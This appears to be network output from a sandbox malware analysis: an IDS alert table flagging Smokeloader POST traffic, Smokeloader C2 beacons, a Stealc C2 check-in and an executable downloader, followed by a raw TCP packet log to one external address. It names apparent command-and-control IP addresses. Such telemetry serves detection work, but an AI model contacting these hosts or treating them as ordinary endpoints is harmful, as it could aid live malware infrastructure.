                                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                              2024-09-02T11:42:46.144858+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975580192.168.2.4102.189.104.201
                                              2024-09-02T11:44:06.074213+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976980192.168.2.4102.189.104.201
                                              2024-09-02T11:44:06.074213+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814976980192.168.2.4102.189.104.201
                                              2024-09-02T11:45:35.566947+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978580192.168.2.4102.189.104.201
                                              2024-09-02T11:45:35.566947+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814978580192.168.2.4102.189.104.201
                                              2024-09-02T11:42:51.699971+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976180192.168.2.4102.189.104.201
                                              2024-09-02T11:42:51.699971+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814976180192.168.2.4102.189.104.201
                                              2024-09-02T11:42:36.818718+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974580192.168.2.4102.189.104.201
                                              2024-09-02T11:42:57.436085+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976580192.168.2.4102.189.104.201
                                              2024-09-02T11:45:46.246051+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978780192.168.2.4102.189.104.201
                                              2024-09-02T11:42:49.853566+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975980192.168.2.4102.189.104.201
                                              2024-09-02T11:44:41.739107+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977680192.168.2.4102.189.104.201
                                              2024-09-02T11:42:44.307397+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975380192.168.2.4102.189.104.201
                                              2024-09-02T11:42:44.307397+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814975380192.168.2.4102.189.104.201
                                              2024-09-02T11:42:40.627412+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974980192.168.2.4102.189.104.201
                                              2024-09-02T11:44:53.089075+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977880192.168.2.4102.189.104.201
                                              2024-09-02T11:44:53.089075+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814977880192.168.2.4102.189.104.201
                                              2024-09-02T11:44:35.445479+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977580192.168.2.4102.189.104.201
                                              2024-09-02T11:42:43.396127+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975280192.168.2.4102.189.104.201
                                              2024-09-02T11:45:20.269684+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978280192.168.2.4102.189.104.201
                                              2024-09-02T11:45:20.269684+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814978280192.168.2.4102.189.104.201
                                              2024-09-02T11:42:33.077567+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974180192.168.2.4102.189.104.201
                                              2024-09-02T11:42:34.012823+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974280192.168.2.4102.189.104.201
                                              2024-09-02T11:42:34.012823+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814974280192.168.2.4102.189.104.201
                                              2024-09-02T11:44:23.938544+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977380192.168.2.4102.189.104.201
                                              2024-09-02T11:42:47.094815+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975680192.168.2.4102.189.104.201
                                              2024-09-02T11:42:52.757802+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile249763443192.168.2.4191.96.144.157
                                              2024-09-02T11:45:30.435855+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978480192.168.2.4102.189.104.201
                                              2024-09-02T11:42:58.475161+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976680192.168.2.4102.189.104.201
                                              2024-09-02T11:44:07.581354+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977080192.168.2.4102.189.104.201
                                              2024-09-02T11:45:51.472671+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978880192.168.2.4102.189.104.201
                                              2024-09-02T11:45:14.633022+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978180192.168.2.4102.189.104.201
                                              2024-09-02T11:45:40.635665+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978680192.168.2.4102.189.104.201
                                              2024-09-02T11:42:29.123326+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973780192.168.2.4102.189.104.201
                                              2024-09-02T11:45:03.508358+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977980192.168.2.4102.189.104.201
                                              2024-09-02T11:42:34.926361+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974380192.168.2.4102.189.104.201
                                              2024-09-02T11:45:25.102743+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978380192.168.2.4102.189.104.201
                                              2024-09-02T11:45:25.102743+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814978380192.168.2.4102.189.104.201
                                              2024-09-02T11:42:39.714288+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974880192.168.2.4102.189.104.201
                                              2024-09-02T11:42:32.133054+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974080192.168.2.4102.189.104.201
                                              2024-09-02T11:42:30.974304+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973980192.168.2.4102.189.104.201
                                              2024-09-02T11:42:30.974304+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814973980192.168.2.4102.189.104.201
                                              2024-09-02T11:44:12.999244+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977180192.168.2.4102.189.104.201
                                              2024-09-02T11:45:57.213860+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978980192.168.2.4102.189.104.201
                                              2024-09-02T11:44:29.746264+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977480192.168.2.4102.189.104.201
                                              2024-09-02T11:44:04.318219+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976880192.168.2.4102.189.104.201
                                              2024-09-02T11:42:37.745024+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974680192.168.2.4102.189.104.201
                                              2024-09-02T11:42:37.745024+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814974680192.168.2.4102.189.104.201
                                              2024-09-02T11:42:48.937036+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975880192.168.2.4102.189.104.201
                                              2024-09-02T11:42:48.937036+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814975880192.168.2.4102.189.104.201
                                              2024-09-02T11:42:50.783382+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976080192.168.2.4102.189.104.201
                                              2024-09-02T11:42:35.855465+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974480192.168.2.4102.189.104.201
                                              2024-09-02T11:42:45.220522+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975480192.168.2.4102.189.104.201
                                              2024-09-02T11:42:30.050148+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973880192.168.2.4102.189.104.201
                                              2024-09-02T11:42:38.679783+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974780192.168.2.4102.189.104.201
                                              2024-09-02T11:44:47.294091+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977780192.168.2.4102.189.104.201
                                              2024-09-02T11:42:48.003225+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975780192.168.2.4102.189.104.201
                                              2024-09-02T11:42:48.003225+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814975780192.168.2.4102.189.104.201
                                              2024-09-02T11:43:01.253746+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14976780192.168.2.491.202.233.158
                                              2024-09-02T11:42:41.556561+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975080192.168.2.4102.189.104.201
                                              2024-09-02T11:42:56.442991+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14976480192.168.2.4102.189.104.201
                                              2024-09-02T11:42:42.462385+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975180192.168.2.4102.189.104.201
                                              2024-09-02T11:45:09.261012+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14978080192.168.2.4102.189.104.201
                                              2024-09-02T11:44:18.565696+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14977280192.168.2.4102.189.104.201
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 2, 2024 11:42:27.842297077 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:27.847393036 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:27.847475052 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:27.847635984 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:27.847656012 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:27.854464054 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:27.856517076 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.123262882 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.123277903 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.123286963 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.123296022 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.123326063 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.123342991 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.124516010 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.124516010 CEST4973780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.126882076 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.129291058 CEST8049737102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.131669044 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.131728888 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.131845951 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.131867886 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:29.137375116 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:29.137382984 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.049175024 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.050087929 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.050148010 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.055702925 CEST4973880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.058238983 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.061912060 CEST8049738102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.063519001 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.063581944 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.063709021 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.063725948 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.068523884 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.068533897 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.973990917 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.974237919 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.974303961 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.974339962 CEST4973980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.976886034 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.979115009 CEST8049739102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.981679916 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.981756926 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.981873035 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.981898069 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:30.986624002 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:30.986681938 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.132819891 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.132908106 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.132916927 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.133054018 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.133090019 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.133135080 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.136590004 CEST4974080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.139934063 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.141338110 CEST8049740102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.144747972 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.144824982 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.144936085 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.144970894 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:32.149687052 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:32.149804115 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.076257944 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.077500105 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.077567101 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.077615976 CEST4974180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.080332041 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.082382917 CEST8049741102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.085098982 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.085165977 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.085263968 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.085287094 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:33.090102911 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:33.090112925 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.012614965 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.012660980 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.012823105 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.012932062 CEST4974280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.015577078 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.017738104 CEST8049742102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.020361900 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.020431995 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.020538092 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.020560026 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.025583029 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.025784969 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.926078081 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.926112890 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.926361084 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.926496029 CEST4974380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.929214954 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.931217909 CEST8049743102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.934041023 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.934122086 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.934243917 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.934336901 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:34.939122915 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:34.939132929 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.855348110 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.855386972 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.855464935 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.855590105 CEST4974480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.860368013 CEST8049744102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.882211924 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.887007952 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.887092113 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.887342930 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.887362957 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:35.893050909 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:35.893204927 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.812870979 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.818633080 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.818717957 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.818877935 CEST4974580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.821197033 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.823796988 CEST8049745102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.826725960 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.826798916 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.826921940 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.826939106 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:36.831656933 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:36.831665993 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.744398117 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.744925976 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.745023966 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.745054007 CEST4974680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.747379065 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.749875069 CEST8049746102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.752181053 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.752254963 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.752362013 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.752388000 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:37.757083893 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:37.757204056 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.679538012 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.679550886 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.679783106 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.722605944 CEST4974780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.727389097 CEST8049747102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.759354115 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.764142990 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.764238119 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.766779900 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.766807079 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:38.771531105 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:38.771605015 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.714164019 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.714193106 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.714287996 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.714457035 CEST4974880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.719187021 CEST8049748102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.723325968 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.728220940 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.728310108 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.728411913 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.728432894 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:39.733227015 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:39.733237028 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.626892090 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.627341032 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.627412081 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.627450943 CEST4974980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.630063057 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.634793997 CEST8049749102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.637072086 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.637141943 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.637253046 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.637279034 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:40.641969919 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:40.642123938 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.556263924 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.556508064 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.556560993 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.556606054 CEST4975080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.560198069 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.561387062 CEST8049750102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.565298080 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.565371037 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.565570116 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.565582991 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:41.571012974 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:41.571161032 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.462212086 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.462316036 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.462384939 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.462517977 CEST4975180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.465775013 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.467268944 CEST8049751102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.470587969 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.470680952 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.470792055 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.470805883 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:42.475526094 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:42.475665092 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.396027088 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.396066904 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.396126986 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.396281004 CEST4975280192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.398832083 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.403527975 CEST8049752102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.405659914 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.405731916 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.405877113 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.405930042 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:43.410999060 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:43.411065102 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.306678057 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.307347059 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.307396889 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.307466030 CEST4975380192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.312217951 CEST8049753102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.319148064 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.323920012 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.323982000 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.324088097 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.324112892 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:44.328804016 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:44.328974962 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.219665051 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.220352888 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.220521927 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.220521927 CEST4975480192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.222939014 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.225351095 CEST8049754102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.227758884 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.227842093 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.227931023 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.227952957 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:45.232666969 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:45.232831001 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:46.144552946 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:46.144790888 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:46.144857883 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.144891024 CEST4975580192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.147188902 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.149821043 CEST8049755102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:46.151962042 CEST8049756102.189.104.201192.168.2.4
